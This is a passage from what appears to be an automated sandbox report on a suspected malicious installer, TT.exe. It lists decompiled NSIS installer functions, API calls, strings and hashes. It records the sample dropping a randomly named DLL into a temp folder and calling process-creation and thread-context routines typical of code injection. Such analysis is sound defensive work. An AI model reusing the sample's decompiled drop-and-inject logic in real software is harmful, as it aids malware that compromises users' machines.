                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\TT.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                • API String ID: 2803837635-444408507
                                                • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                                                • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\engineer\AppData\Local\Temp\nse2C42.tmp\myx92o78208f0o.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\engineer\AppData\Local\Temp\nse2C42.tmp\myx92o78208f0o.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

















                                                0x00401759
                                                0x00401760
                                                0x00401769
                                                0x0040176c
                                                0x0040176f
                                                0x00401774
                                                0x00401775
                                                0x0040177c
                                                0x00401798
                                                0x0040177e
                                                0x0040177f
                                                0x0040177f
                                                0x0040179e
                                                0x004017a8
                                                0x004017a8
                                                0x004017ac
                                                0x004017af
                                                0x004017b4
                                                0x004017b6
                                                0x004017b8
                                                0x004017bd
                                                0x004017bd
                                                0x004017c8
                                                0x004017c8
                                                0x004017d9
                                                0x004017db
                                                0x004017db
                                                0x004017dc
                                                0x004017dc
                                                0x004017df
                                                0x004017e2
                                                0x004017e5
                                                0x004017e5
                                                0x004017ec
                                                0x004017fb
                                                0x00401800
                                                0x00401803
                                                0x00401806
                                                0x00000000
                                                0x00000000
                                                0x00401808
                                                0x0040180b
                                                0x00401865
                                                0x0040186a
                                                0x004015b0
                                                0x004027bf
                                                0x004027bf
                                                0x00402a5a
                                                0x00402a5d
                                                0x00402a5d
                                                0x00000000
                                                0x0040180d
                                                0x00401813
                                                0x0040181e
                                                0x0040182b
                                                0x00401836
                                                0x0040184c
                                                0x0040184c
                                                0x0040184f
                                                0x00000000
                                                0x00401855
                                                0x00401855
                                                0x00401856
                                                0x00401873
                                                0x00402a63
                                                0x00402a63
                                                0x00402a63
                                                0x00401858
                                                0x00401858
                                                0x00401859
                                                0x00401492
                                                0x00402387
                                                0x00402387
                                                0x00402387
                                                0x00401856
                                                0x0040184f
                                                0x00402a65
                                                0x00402a69
                                                0x00402a69
                                                0x00401883
                                                0x00401888
                                                0x00401896
                                                0x0040189b
                                                0x004018a1
                                                0x004018a5
                                                0x004018a7
                                                0x004018af
                                                0x004018bb
                                                0x004018a9
                                                0x004018a9
                                                0x004018ad
                                                0x00000000
                                                0x00000000
                                                0x004018ad
                                                0x004018c4
                                                0x004018ca
                                                0x004018cc
                                                0x00000000
                                                0x004018d2
                                                0x004018d2
                                                0x004018d5
                                                0x004018ed
                                                0x004018d7
                                                0x004018da
                                                0x004018e3
                                                0x004018e3
                                                0x004018f2
                                                0x004018f7
                                                0x00402382
                                                0x00000000
                                                0x00402382
                                                0x00000000

                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                  • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                  • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                  • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                  • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                  • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nse2C42.tmp\myx92o78208f0o.dll$uvlcopdlxoed
                                                • API String ID: 1941528284-2988862413
                                                • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                                                • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03020723, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,55E38B1F,?,050A26AF,?,D6EB2188,?,433A3842), ref: 03020825
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 030209F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344683936.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: 28e0f40a88715bc388ee90f952909dbfdf2d1345a60a7cd7bf4c7a57ca5471f6
                                                • Instruction ID: a93c9e8e950b7710d986d451c4d53e3cba80f39c3392befde0464fb320585079
                                                • Opcode Fuzzy Hash: 28e0f40a88715bc388ee90f952909dbfdf2d1345a60a7cd7bf4c7a57ca5471f6
                                                • Instruction Fuzzy Hash: 8EA1FE34D02319EFEF50DFE4D889BAEBBB5BF08311F20859AE501BA2A0D3755A50DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                0x00405820
                                                0x00405824
                                                0x00405827
                                                0x0040582d
                                                0x00405831
                                                0x00405835
                                                0x0040583d
                                                0x00405844
                                                0x0040584a
                                                0x00405851
                                                0x00405858
                                                0x00405860
                                                0x00405862
                                                0x00000000
                                                0x00405862
                                                0x0040586c
                                                0x00405873
                                                0x00405889
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040588b
                                                0x0040588f

                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                • GetLastError.KERNEL32 ref: 0040586C
                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                                                • GetLastError.KERNEL32 ref: 0040588B
                                                Strings
                                                • C:\Users\user\Desktop, xrefs: 00405815
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                • API String ID: 3449924974-1229045261
                                                • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                                                • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                0x004065da
                                                0x004065e3
                                                0x004065e5
                                                0x004065e5
                                                0x004065e9
                                                0x004065fb
                                                0x004065f5
                                                0x004065f5
                                                0x004065f5
                                                0x004065ff
                                                0x00406613
                                                0x00406627
                                                0x0040662e

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 004065DA
                                                • wsprintfA.USER32 ref: 00406613
                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%s.dll$UXTHEME$\
                                                • API String ID: 2200240437-4240819195
                                                • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                                                • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0302152C, Relevance: 9.1, APIs: 6, Instructions: 123memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 03021566
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 030215C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344683936.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false
                                                Similarity
                                                • API ID: AllocCreateFileVirtual
                                                • String ID:
                                                • API String ID: 1475775534-0
                                                • Opcode ID: 663ed5e66775fe4a6e7adc0cb520901fc04a639066d29d51406e6a5a3bf66588
                                                • Instruction ID: f673362fbb553bf6ada95e41ff0b3c96441c070f56a8668e6af1fea3e765079e
                                                • Opcode Fuzzy Hash: 663ed5e66775fe4a6e7adc0cb520901fc04a639066d29d51406e6a5a3bf66588
                                                • Instruction Fuzzy Hash: B7410471E41329BFEF649BA0CC09FEEBA78AF04701F0441D1B619B90D0DBB05A809F15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                0x0040209d
                                                0x0040209d
                                                0x004020a2
                                                0x004020a9
                                                0x00402164
                                                0x004022dd
                                                0x004022dd
                                                0x00402a5a
                                                0x00402a5d
                                                0x00402a69
                                                0x00402a69
                                                0x004020b8
                                                0x004020c2
                                                0x004020c5
                                                0x004020d4
                                                0x004020d8
                                                0x004020de
                                                0x004020e2
                                                0x0040215d
                                                0x00000000
                                                0x0040215d
                                                0x004020e4
                                                0x004020ed
                                                0x004020f1
                                                0x00402135
                                                0x004020f3
                                                0x004020f6
                                                0x004020f9
                                                0x00402129
                                                0x004020fb
                                                0x004020fe
                                                0x00402107
                                                0x00402109
                                                0x00402109
                                                0x00402107
                                                0x004020f9
                                                0x0040213d
                                                0x00402152
                                                0x00402152
                                                0x00000000
                                                0x0040213d
                                                0x004020c8
                                                0x004020ce
                                                0x004020d2
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                  • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                  • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                  • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                  • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                  • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID: GB
                                                • API String ID: 2987980305-3285937634
                                                • Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                                • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                                                • Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                                • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                0x00405df4
                                                0x00405dfa
                                                0x00405dfb
                                                0x00405dfb
                                                0x00405e00
                                                0x00405e01
                                                0x00405e04
                                                0x00405e0e
                                                0x00405e1b
                                                0x00405e1e
                                                0x00405e26
                                                0x00000000
                                                0x00000000
                                                0x00405e2a
                                                0x00000000
                                                0x00000000
                                                0x00405e2c
                                                0x00000000
                                                0x00405e2c
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405E04
                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\TT.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1017478977
                                                • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                                                • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0302024C, Relevance: 6.4, APIs: 4, Instructions: 399processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03020391
                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 030203B4
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 030203D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.344683936.0000000003020000.00000040.00000001.sdmp, Offset: 03020000, based on PE: false
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThread
                                                • String ID:
                                                • API String ID: 2411489757-0
                                                • Opcode ID: 81343d122dbf4a6d2de39fc39a1223259291bd881831acadd28c9f71186cc406
                                                • Instruction ID: ff2ab6c305dd6a1cd3d2dd81711955f4a8677df354d76dad50ce957c66a2a260
                                                • Opcode Fuzzy Hash: 81343d122dbf4a6d2de39fc39a1223259291bd881831acadd28c9f71186cc406
                                                • Instruction Fuzzy Hash: 3402F271D01228EFDB24CF94CC89BEDBBB9BF48305F1480A9E515BA2A0D7709A85DF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 87%
                                                			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
